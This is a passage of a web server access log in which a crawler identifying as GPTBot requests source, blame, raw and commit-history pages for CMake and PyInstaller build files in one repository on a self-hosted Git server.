192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/CMakeFiles" +[17/Feb/2026:14:59:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/CMakeFiles/TargetDirectories.txt" [Client 74.7.227.38] [Length 11190] [Gzip 3.08] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/CMakeFiles" +[17/Feb/2026:14:59:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/CMakeFiles/Makefile2" [Client 74.7.227.38] [Length 14297] [Gzip 4.40] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/CMakeFiles" +[17/Feb/2026:14:59:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/gold_monitor_full/localpycs/pyimod04_pywin32.pyc" [Client 74.7.227.38] [Length 10949] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/gold_monitor_full/localpycs" +[17/Feb/2026:14:59:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/gold_monitor_full/localpycs/pyimod02_importers.pyc" [Client 74.7.227.38] [Length 10947] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/gold_monitor_full/localpycs" +[17/Feb/2026:14:59:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/gold_monitor_full/localpycs/pyimod01_archive.pyc" [Client 74.7.227.38] [Length 10949] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/gold_monitor_full/localpycs" +[17/Feb/2026:14:59:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/gold_monitor_full/localpycs/pyimod03_ctypes.pyc" [Client 74.7.227.38] [Length 10947] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/gold_monitor_full/localpycs" +[17/Feb/2026:14:59:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/gold_monitor_full/localpycs" [Client 74.7.227.38] [Length 9930] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/gold_monitor_full/localpycs" +[17/Feb/2026:14:59:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/CMakeFiles/cmake.check_cache" [Client 74.7.227.38] [Length 10071] [Gzip 2.89] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/CMakeFiles/cmake.check_cache" +[17/Feb/2026:14:59:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/CMakeFiles/CMakeDirectoryInformation.cmake" [Client 74.7.227.38] [Length 9957] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/CMakeFiles/CMakeDirectoryInformation.cmake" +[17/Feb/2026:14:59:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.internal" [Client 74.7.227.38] [Length 16049] [Gzip 5.57] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/CMakeFiles/TestApp.dir" +[17/Feb/2026:14:59:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/CMakeFiles/CMakeDirectoryInformation.cmake" [Client 74.7.227.38] [Length 672] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/CMakeFiles/CMakeDirectoryInformation.cmake" +[17/Feb/2026:14:59:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/CMakeFiles/cmake.check_cache" [Client 74.7.227.38] [Length 85] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/CMakeFiles/cmake.check_cache" +[17/Feb/2026:14:59:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/CMakeFiles/TestApp.dir/DependInfo.cmake" [Client 74.7.227.38] [Length 12009] [Gzip 3.45] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/CMakeFiles/TestApp.dir" +[17/Feb/2026:14:59:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/gold_monitor_full/localpycs/pyimod04_pywin32.pyc" [Client 74.7.227.38] [Length 9939] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/gold_monitor_full/localpycs/pyimod04_pywin32.pyc" +[17/Feb/2026:14:59:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/gold_monitor_full/localpycs/pyimod04_pywin32.pyc" [Client 74.7.227.38] [Length 14343] [Gzip 8.68] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/gold_monitor_full/localpycs/pyimod04_pywin32.pyc" +[17/Feb/2026:14:59:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/gold_monitor_full/localpycs/pyimod04_pywin32.pyc" [Client 74.7.227.38] [Length 1624] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/gold_monitor_full/localpycs/pyimod04_pywin32.pyc" +[17/Feb/2026:14:59:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/gold_monitor_full/localpycs/pyimod02_importers.pyc" [Client 74.7.227.38] [Length 73581] [Gzip 20.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/gold_monitor_full/localpycs/pyimod02_importers.pyc" +[17/Feb/2026:14:59:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/gold_monitor_full/localpycs/pyimod01_archive.pyc" [Client 74.7.227.38] [Length 21840] [Gzip 12.75] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/gold_monitor_full/localpycs/pyimod01_archive.pyc" +[17/Feb/2026:14:59:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/gold_monitor_full/localpycs/pyimod02_importers.pyc" [Client 74.7.227.38] [Length 32204] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/gold_monitor_full/localpycs/pyimod02_importers.pyc" +[17/Feb/2026:14:59:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/gold_monitor_full/localpycs/pyimod03_ctypes.pyc" [Client 74.7.227.38] [Length 24020] [Gzip 15.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/gold_monitor_full/localpycs/pyimod03_ctypes.pyc" +[17/Feb/2026:14:59:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.internal" [Client 74.7.227.38] [Length 16397] [Gzip 12.59] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.internal" +[17/Feb/2026:14:59:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.internal" [Client 74.7.227.38] [Length 8040] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.internal" +[17/Feb/2026:14:59:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/gold_monitor_full/localpycs/pyimod01_archive.pyc" [Client 74.7.227.38] [Length 4858] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/gold_monitor_full/localpycs/pyimod01_archive.pyc" +[17/Feb/2026:14:59:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/CMakeFiles/TestApp.dir/DependInfo.cmake" [Client 74.7.227.38] [Length 11514] [Gzip 4.60] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/CMakeFiles/TestApp.dir/DependInfo.cmake" +[17/Feb/2026:14:59:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/CMakeFiles/TestApp.dir/DependInfo.cmake" [Client 74.7.227.38] [Length 777] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/CMakeFiles/TestApp.dir/DependInfo.cmake" +[17/Feb/2026:14:59:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/gold_monitor_full/localpycs/pyimod03_ctypes.pyc" [Client 74.7.227.38] [Length 6151] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/gold_monitor_full/localpycs/pyimod03_ctypes.pyc" +[17/Feb/2026:14:59:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/CMakeFiles/cmake.check_cache" [Client 74.7.227.38] [Length 9951] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/CMakeFiles/cmake.check_cache" +[17/Feb/2026:14:59:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/CMakeFiles/TargetDirectories.txt" [Client 74.7.227.38] [Length 9948] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/CMakeFiles/TargetDirectories.txt" +[17/Feb/2026:14:59:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/CMakeFiles/TestApp.dir/DependInfo.cmake" [Client 74.7.227.38] [Length 9960] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/CMakeFiles/TestApp.dir/DependInfo.cmake" +[17/Feb/2026:14:59:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/CMakeFiles/CMakeDirectoryInformation.cmake" [Client 74.7.227.38] [Length 11019] [Gzip 3.84] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/CMakeFiles/CMakeDirectoryInformation.cmake" +[17/Feb/2026:14:59:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.internal" [Client 74.7.227.38] [Length 9969] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.internal" +[17/Feb/2026:14:59:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/gold_monitor_full/localpycs/pyimod01_archive.pyc" [Client 74.7.227.38] [Length 9939] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/gold_monitor_full/localpycs/pyimod01_archive.pyc" +[17/Feb/2026:14:59:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/gold_monitor_full/localpycs/pyimod02_importers.pyc" [Client 74.7.227.38] [Length 9941] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/gold_monitor_full/localpycs/pyimod02_importers.pyc" +[17/Feb/2026:14:59:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/gold_monitor_full/localpycs/pyimod03_ctypes.pyc" [Client 74.7.227.38] [Length 9938] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/gold_monitor_full/localpycs/pyimod03_ctypes.pyc" +[17/Feb/2026:14:59:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/CMakeFiles/TargetDirectories.txt" [Client 74.7.227.38] [Length 10173] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/CMakeFiles/TargetDirectories.txt" +[17/Feb/2026:14:59:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/CMakeFiles/CMakeConfigureLog.yaml" [Client 74.7.227.38] [Length 39738] [Gzip 13.74] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/CMakeFiles/CMakeConfigureLog.yaml" +[17/Feb/2026:14:59:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/CMakeFiles/CMakeConfigureLog.yaml" [Client 74.7.227.38] [Length 53866] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/CMakeFiles/CMakeConfigureLog.yaml" +[17/Feb/2026:14:59:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/CMakeFiles/TargetDirectories.txt" [Client 74.7.227.38] [Length 234] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/CMakeFiles/TargetDirectories.txt" +[17/Feb/2026:14:59:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/CMakeFiles/CMakeConfigureLog.yaml" [Client 74.7.227.38] [Length 9962] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/CMakeFiles/CMakeConfigureLog.yaml" +[17/Feb/2026:14:59:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/CMakeFiles/Makefile2" [Client 74.7.227.38] [Length 14302] [Gzip 8.69] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/CMakeFiles/Makefile2" +[17/Feb/2026:14:59:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/CMakeFiles/Makefile2" [Client 74.7.227.38] [Length 4092] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/CMakeFiles/Makefile2" +[17/Feb/2026:14:59:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/build/AssetPilot/Analysis-00.toc" [Client 74.7.227.38] [Length 9909] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/build/AssetPilot/Analysis-00.toc" +[17/Feb/2026:14:59:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/build/AssetPilot/Analysis-00.toc" [Client 74.7.227.38] [Length 130628] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/build/AssetPilot/Analysis-00.toc" +[17/Feb/2026:14:59:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/build/GoldMonitor/EXE-00.toc" [Client 74.7.227.38] [Length 23283] [Gzip 11.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/build/GoldMonitor" +[17/Feb/2026:14:59:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/build/GoldMonitor/base_library.zip" [Client 74.7.227.38] [Length 10869] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/build/GoldMonitor" +[17/Feb/2026:14:59:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/TestApp" [Client 74.7.227.38] [Length 28192] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/TestApp" +[17/Feb/2026:14:59:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr 